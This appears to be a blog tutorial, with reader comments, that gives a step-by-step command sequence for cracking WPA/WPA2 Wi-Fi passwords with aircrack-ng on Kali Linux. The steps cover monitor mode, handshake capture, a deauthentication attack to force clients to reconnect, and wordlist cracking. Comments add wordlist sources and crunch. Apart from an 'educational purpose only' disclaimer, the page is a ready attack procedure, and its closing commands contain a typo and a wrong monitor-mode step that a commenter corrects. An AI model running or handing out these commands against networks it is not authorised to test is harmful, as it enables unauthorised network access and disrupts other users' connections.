Home How To Crack WPA & WPA2 with Aircrack-ng on Kali Linux

Crack WPA & WPA2 with Aircrack-ng on Kali Linux

by Unallocated Author

Aircrack-ng best WiFi penetration testing tool used by hackers. In this tutorial we are going to teach you How to Crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only.

Also Read: Top 10 WiFi Hacking Tools Used by Hackers

Note: This tutorial is only for educational purpose. Use this tool at your own risks, we are not responsible for any damage that cause you.

Things we used for Cracking WPA & WPA2:

Command to Crack WPA & WPA2:

airmon-ng 
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
airodump-ng wlan0 
airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0
aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0
aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap
sudo ifconfig wlan0 down
sudo iwcofnig wlan0 mode monitor
sudo ifconfig wlan0 up 

Here is a YouTube video on How to Crack WPA and WPA2 with Aircrack-ng on Kali Linux:

In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.

You may also like

6 comments

Robert October 6, 2015 - 5:38 pm

After you introduce this line “airodump-ng wlan0”, I can’t write anything after. What should I do so that “root@kali:#” appear in order to continue to introduce other commands.

Onkar November 8, 2015 - 2:28 am

Bro, press “ctrl+C”. Or open a new terminal without closing the previous one. As we need it to get bssid , channel and the name of network we are cracking.

kawazaki August 5, 2016 - 6:22 am

Because the last command was write in “sudo” mode so you need to enter you “sudo” password which is usually root or thor.
Btw line10 is wrong if you want to reset your ifconfig you should write

sudo iwconfig wlan0 mode manager
instead of
sudo iwcofnig wlan0 mode monitor

rkhan September 13, 2015 - 1:35 pm

what to do if i dont have password list …

And what to do if password list not contain the password matching word …

Any trick without word list ???

Rodrigo November 7, 2015 - 9:58 pm

You can use wordfield, but this mode is slowless…

max November 7, 2015 - 10:22 pm

there is few wordlists in kali by default.
and you can find very large, like 15GB lists … https://goo.gl/F84s0l
or you can easily create your own lists with crunch

Comments are closed.